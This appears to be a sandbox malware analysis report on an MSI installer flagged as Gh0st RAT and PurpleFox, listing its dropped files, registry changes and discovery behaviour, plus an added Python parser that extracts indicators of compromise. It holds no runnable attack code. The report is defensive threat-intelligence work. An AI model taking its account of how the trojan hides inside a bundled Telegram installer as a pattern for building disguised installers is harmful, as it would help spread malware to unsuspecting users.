Malware Analysis Report

2024-12-07 13:05

Sample ID 241109-spgxsaxbmq
Target 92553e176daf1cc411113c65eeec0fb2327100fc43356352787844ae85b78fdf.msi.vir
SHA256 92553e176daf1cc411113c65eeec0fb2327100fc43356352787844ae85b78fdf
Tags: discovery execution persistence privilege_escalation gh0strat purplefox rat rootkit trojan
Score: 10/10

Table of Contents

  Analysis Overview
  MITRE ATT&CK
    Enterprise Matrix V15
  Analysis: static1
    Detonation Overview
    Signatures
  Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
  Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

Score: 10/10

SHA256: 92553e176daf1cc411113c65eeec0fb2327100fc43356352787844ae85b78fdf

Threat Level: Known bad

The file 92553e176daf1cc411113c65eeec0fb2327100fc43356352787844ae85b78fdf.msi.vir was found to be: Known bad.

Malicious Activity Summary

discovery execution persistence privilege_escalation gh0strat purplefox rat rootkit trojan

Gh0st RAT payload

Gh0strat family

PurpleFox

Purplefox family

Detect PurpleFox Rootkit

Gh0strat

Command and Scripting Interpreter: PowerShell

Enumerates connected drives

Drops file in System32 directory

Loads dropped DLL

Drops file in Windows directory

Drops file in Program Files directory

Executes dropped EXE

System Network Configuration Discovery: Internet Connection Discovery

Enumerates physical storage devices

Event Triggered Execution: Installer Packages

System Location Discovery: System Language Discovery

Runs ping.exe

Checks SCSI registry key(s)

Uses Volume Shadow Copy service COM API

Checks processor information in registry

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Modifies registry class

Suspicious behavior: AddClipboardFormatListener

Suspicious use of AdjustPrivilegeToken

Enumerates system info in registry

Suspicious use of SendNotifyMessage

Suspicious use of SetWindowsHookEx

Modifies data under HKEY_USERS

Suspicious behavior: CmdExeWriteProcessMemorySpam

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-11-09 15:17

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-11-09 15:17
Reported: 2024-11-09 15:20
Platform: win7-20241023-en
Max time kernel: 141s
Max time network: 132s

Command Line

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\92553e176daf1cc411113c65eeec0fb2327100fc43356352787844ae85b78fdf.msi

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\A: \??\B: \??\E: \??\G: \??\H: \??\I: \??\J: \??\K: \??\L: \??\M: \??\N: \??\O: \??\P: \??\Q: \??\R: \??\S: \??\T: \??\U: \??\V: \??\W: \??\X: \??\Y: \??\Z: C:\Windows\system32\msiexec.exe N/A
(46 events in the original table: each of the 23 drive letters above, i.e. every letter except C:, D: and F:, opened twice by msiexec.exe. Probing every drive letter is routine Windows Installer behaviour during install costing, not something specific to this sample.)

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\Saved Games C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\Saved Games\desktop.ini C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357 C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357 C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\SustainSleekTutor\NLGACUfhExiQgpFqVoxutQoGyuzRSw C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
File created C:\Program Files\SustainSleekTutor\2_bFchqPntlegL.exe C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
File opened for modification C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe C:\Windows\system32\MsiExec.exe N/A
File created C:\Program Files\SustainSleekTutor\valibclang2d.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\SustainSleekTutor\NMnDkvvmlBOPWlKYckpqMpfXmIsbMf C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
File created C:\Program Files\SustainSleekTutor\NLGACUfhExiQgpFqVoxutQoGyuzRSw C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
File created C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe C:\Windows\system32\MsiExec.exe N/A
File created C:\Program Files\SustainSleekTutor\bFchqPntlegL.vbs C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
File created C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.xml C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
File opened for modification C:\Program Files\SustainSleekTutor\2_bFchqPntlegL.exe C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
File opened for modification C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.exe C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
File created C:\Program Files\SustainSleekTutor\bFchqPntlegL C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
File opened for modification C:\Program Files\SustainSleekTutor\NMnDkvvmlBOPWlKYckpqMpfXmIsbMf C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
File opened for modification C:\Program Files\SustainSleekTutor\bFchqPntlegL C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
File opened for modification C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.xml C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
File created C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.exe C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
File created C:\Program Files\SustainSleekTutor\lBktGjuuaOaTazRwJvXXhRyefRHhOg C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\SustainSleekTutor\tsetup.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe C:\Windows\system32\msiexec.exe N/A
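The rows above, like every signature table in this report, are the sandbox's four-column table (Description, Indicator, Process, Target) flattened into one space-separated line, which makes them awkward to turn into hunt lists: both the indicator and the process column can contain spaces (Program Files, Telegram Desktop), so a plain split() mis-assigns columns. The parser below is an added example written for this page, not part of the sandbox's output or tooling. It matches the description against the fixed vocabulary used in this report, takes the last drive-letter path on the line as the process column, and groups what it finds by process. The sample rows are copied from this report's tables; their selection is constructed for the example.

```python
"""Parse the flattened signature-table rows of a sandbox report and pull out host IOCs.

Each row is "Description Indicator Process Target" joined with single spaces.
Indicator and process paths can both contain spaces (Program Files, Telegram
Desktop), so the description is matched against the sandbox's fixed vocabulary
and the process column is taken as the LAST drive-letter path on the line.
"""
import re
from collections import defaultdict
from dataclasses import dataclass

# Rows copied verbatim from this report's tables; the selection is constructed
# for the example (one row per description type, plus two edge cases).
SAMPLE_ROWS = [
    r"File created C:\Program Files\SustainSleekTutor\bFchqPntlegL.vbs C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A",
    r"File created C:\Program Files\SustainSleekTutor\tsetup.exe C:\Windows\system32\msiexec.exe N/A",
    r"File opened for modification C:\Windows\Installer\MSID401.tmp C:\Windows\system32\msiexec.exe N/A",
    r"Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\SustainSleekTutor\tsetup.exe N/A",
    r'Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1\DisplayIcon = "C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe" C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A',
    r"Token: SeLoadDriverPrivilege N/A C:\Windows\system32\msiexec.exe N/A",
    r"N/A N/A C:\Windows\system32\PING.EXE N/A",
    r"N/A N/A N/A N/A",  # the sandbox recorded no process for some events
]

# Description vocabulary seen in this report's tables.
DESC_RE = re.compile(
    r"^(?P<desc>File created|File opened for modification|File opened \(read-only\)|"
    r"Key created|Key opened|Key queried|Key value queried|Key deleted|"
    r"Set value \((?:str|int|data)\)|Token: \S+|N/A)\s+(?P<rest>.*)$"
)
# Whitespace that immediately precedes a drive-letter path such as C:\...
PATH_START_RE = re.compile(r"\s(?=[A-Z]:\\)")


@dataclass(frozen=True)
class SignatureRow:
    description: str
    indicator: str
    process: str
    target: str


def parse_row(row: str) -> SignatureRow:
    """Split one flattened row into its four columns."""
    m = DESC_RE.match(row.strip())
    if not m:
        raise ValueError(f"unrecognised row: {row!r}")
    desc, rest = m.group("desc"), m.group("rest")
    # Target is the final whitespace-delimited token (always N/A in this report).
    rest, _, target = rest.rpartition(" ")
    # The indicator may itself be a path, so the process is the LAST drive-letter
    # path. A quoted path inside a registry value is preceded by a quote, not
    # whitespace, and therefore does not match.
    starts = list(PATH_START_RE.finditer(rest))
    if starts:
        cut = starts[-1].start()
        indicator, process = rest[:cut], rest[cut + 1:]
    else:
        indicator, _, process = rest.rpartition(" ")  # e.g. "N/A N/A"
    return SignatureRow(desc, indicator, process, target)


def extract_iocs(rows):
    """Group file, registry and privilege indicators by the process responsible."""
    iocs = defaultdict(lambda: {"files": set(), "registry": set(), "privileges": set()})
    for rec in map(parse_row, rows):
        if rec.process == "N/A":
            continue
        bucket = iocs[rec.process]
        if rec.description.startswith("File"):
            bucket["files"].add(rec.indicator)
        elif rec.description.startswith(("Key", "Set value")):
            # Keep the key/value path; drop the "= data" tail of Set value rows.
            bucket["registry"].add(rec.indicator.split(" = ", 1)[0])
        elif rec.description.startswith("Token:"):
            bucket["privileges"].add(rec.description.split(": ", 1)[1])
    return dict(iocs)


if __name__ == "__main__":
    for proc, found in sorted(extract_iocs(SAMPLE_ROWS).items()):
        print(proc)
        for kind in ("files", "registry", "privileges"):
            for item in sorted(found[kind]):
                print(f"  {kind:10} {item}")
```

Run stand-alone it prints, per process, the files, registry paths and privileges attributed to it; fed the whole report it yields the dropped-file list for C:\Program Files\SustainSleekTutor and the HKU\.DEFAULT uninstall keys written by the bundled Telegram Desktop installer without retyping a single path. A row whose description is not in DESC_RE raises rather than being guessed at, which is the right default for an IOC pipeline: a silently mis-split path is worse than a loud failure.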

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\INF\setupapi.ev3 C:\Windows\system32\DrvInst.exe N/A
File created C:\Windows\Installer\f76d2ba.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f76d2bd.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f76d2bb.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\INF\setupapi.ev1 C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\INF\setupapi.dev.log C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\Installer\f76d2ba.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f76d2bb.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSID401.tmp C:\Windows\system32\msiexec.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Program Files\SustainSleekTutor\tsetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A
N/A N/A N/A N/A (4 events; no process recorded by the sandbox)
N/A N/A C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Installer Packages

persistence privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\SustainSleekTutor\tsetup.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\ C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1 C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1\UninstallString = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\unins000.exe\"" C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Direct3D\MostRecentApplication C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\tdesktop.tg\shell\open\command C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\TelegramDesktop\Capabilities\UrlAssociations\tg = "tdesktop.tg" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E\52C64B7E\@%SystemRoot%\system32\p2pcollab.dll,-8042 = "Peer to Peer Trust" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\RestartManager\Session0000\SessionHash = 5db37eef26c6c6f456c8bacc6fd041a610f370e2fc9d86d251445c7309c40c49 C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\DrvInst.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1\DisplayVersion = "5.2.3" C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1\VersionMinor = "2" C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\DrvInst.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1\Inno Setup: Deselected Tasks C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\ActiveMovie\devenum 64-bit C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\DrvInst.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1\Inno Setup: Language = "english" C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1\DisplayIcon = "C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe" C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\tg C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\DrvInst.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1\QuietUninstallString = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\unins000.exe\" /SILENT" C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E\52C64B7E\@%SystemRoot%\system32\qagentrt.dll,-10 = "System Health Authentication" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\DrvInst.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1\URLUpdateInfo = "https://desktop.telegram.org" C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\DrvInst.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\RestartManager\Session0000\Owner = 500300008055b5a5ba32db01 C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\ActiveMovie C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\DrvInst.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1\VersionMajor = "5" C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\DrvInst.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\RestartManager\Session0000\RegFiles0000 = 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 C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1\MinorVersion = "2" C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\RestartManager C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1\Inno Setup: App Path = "C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop" C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1\DisplayName = "Telegram Desktop" C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\RestartManager\Session0000 C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1\NoModify = "1" C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\tdesktop.tg C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\tdesktop.tg\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe\" -- \"%1\"" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\RegisteredApplications C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\DrvInst.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\D79DD49E5C47660498C5E1D7A560895F C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\D79DD49E5C47660498C5E1D7A560895F\ProductFeature C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
